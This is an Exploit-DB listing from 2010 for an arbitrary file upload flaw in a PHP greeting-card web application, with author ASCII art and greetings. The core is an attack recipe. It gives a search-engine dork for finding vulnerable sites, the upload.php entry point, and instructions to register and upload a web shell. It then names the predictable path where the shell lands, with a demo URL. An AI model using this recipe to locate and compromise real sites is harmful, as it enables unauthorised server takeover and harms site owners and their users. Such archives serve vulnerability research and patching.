greeting card - Arbitrary File Upload

EDB-ID:

13751

CVE:

N/A

EDB Verified:

Author:

Mr.Benladen

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-06-06

Vulnerable App:

# Exploit Title: [greeting card Remote Upload Vulnerability]
# Date: [04/06/2010]
# Author: [Mr.Benladen]
# Software Link: [N/A]
# Version: [2004/2008]
# Tested on: [Linux/unix]
# CVE : [if exists]
# Code : [N/A]
#Email : MaFiadu48@hotmail.fr

##############################
########################################################################

# # # #
# # # #
# # # #
# ## #### ## #
## ## ###### ## ##
## ## ###### ## ##
## ## #### ## ##
### ############ ###
########################
Mr.Benladen cr3w
##############
######## ########## #######
### ## ########## ## ###
### ## ########## ## ###
### # ########## # ###
### ## ######## ## ###
## # ###### # ##
## # #### # ##
## ##

######################################################################################################

[Dork ]: "Send amazing greetings to your friends and relative!"

{exploit} : http://127.0.0.1/upload.php

First register and the site and go to upload cards

After you have uploaded your shells , you will find it in this Path :
http://[site]//cards/id_thumb_evil.php

demo : http://server/cards/1275663706_thumb_oujda.php

######################################################################################################


Greetz To : Federal7-blackroot-khalidmoro-ra3ch-yesmouh-Zi00n From
Ukrania-Dr.Prorat all My Friend

and al muslim h4x0r

M0r0Can Is Here

--=-=-=-=-www.Joomlaservice.info <http://www.joomlaservice.info/> or
www.dz4all.com -=-=-=-=--=

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services